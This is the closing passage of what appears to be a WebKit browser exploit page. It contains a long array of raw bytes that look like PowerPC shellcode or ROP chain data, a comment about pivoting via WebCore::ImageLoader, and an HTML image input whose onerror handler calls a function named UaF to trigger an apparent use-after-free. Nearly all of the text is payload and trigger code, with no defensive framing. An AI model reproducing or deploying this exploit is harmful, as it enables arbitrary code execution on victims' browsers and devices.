0x41, 0x00, 0x4c, 0x91, 0x41, 0x00, 0x94, 0x91, 0x41, 0x00, 0xdc, 0x91, 0x41, 0x01, 0x24, 0x3d, 0x40, 0x01, 0x02, 0x61, 0x4a, 0x3f, 0x88, 0x91, 0x41, 0x00, 0xf8, 0x3d, 0x40, 0x01, 0x02, 0x61, 0x4a, 0x40, 0xb0, 0x91, 0x41, 0x01, 0x40, 0x3d, 0x40, 0x01, 0x03, 0x61, 0x4a, 0x5f, 0xc8, 0x91, 0x41, 0x00, 0x68, 0x3d, 0x40, 0x01, 0x03, 0x61, 0x4a, 0x76, 0xc0, 0x91, 0x41, 0x00, 0x20, 0x91, 0x41, 0x00, 0xb0, 0x3d, 0x40, 0x01, 0x07, 0x61, 0x4a, 0xdd, 0x70, 0x91, 0x41, 0x00, 0x1c, 0x91, 0x41, 0x00, 0x64, 0x91, 0x41, 0x00, 0xac, 0x91, 0x41, 0x00, 0xf4, 0x91, 0x41, 0x01, 0x3c, 0x3d, 0x40, 0x01, 0x08, 0x61, 0x4a, 0x02, 0x74, 0x91, 0x41, 0x00, 0x34, 0x91, 0x41, 0x00, 0x7c, 0x91, 0x41, 0x00, 0xc4, 0x91, 0x41, 0x01, 0x0c, 0x91, 0x41, 0x01, 0x54, 0x3d, 0x40, 0x01, 0x80, 0x91, 0x41, 0x00, 0x6c, 0x91, 0x41, 0x00, 0xfc, 0x91, 0x41, 0x01, 0x44, 0x91, 0x41, 0x01, 0x5c, 0x90, 0xe1, 0x00, 0x74, 0x91, 0x61, 0x00, 0x5c, 0x91, 0x61, 0x01, 0x04, 0x91, 0x61, 0x01, 0x4c, 0x80, 0x01, 0x00, 0x04, 0x7c, 0x08, 0x03, 0xa6, 0x4e, 0x80, 0x00, 0x20, 0x4e, 0x80, 0x00, 0x20,
]
);
}
alert("verify...");
//Use the new WebCore::ImageLoader & pivot !
return 0;
}
</script>
<input id="x" type="image" onerror="UaF(this);" src=""/>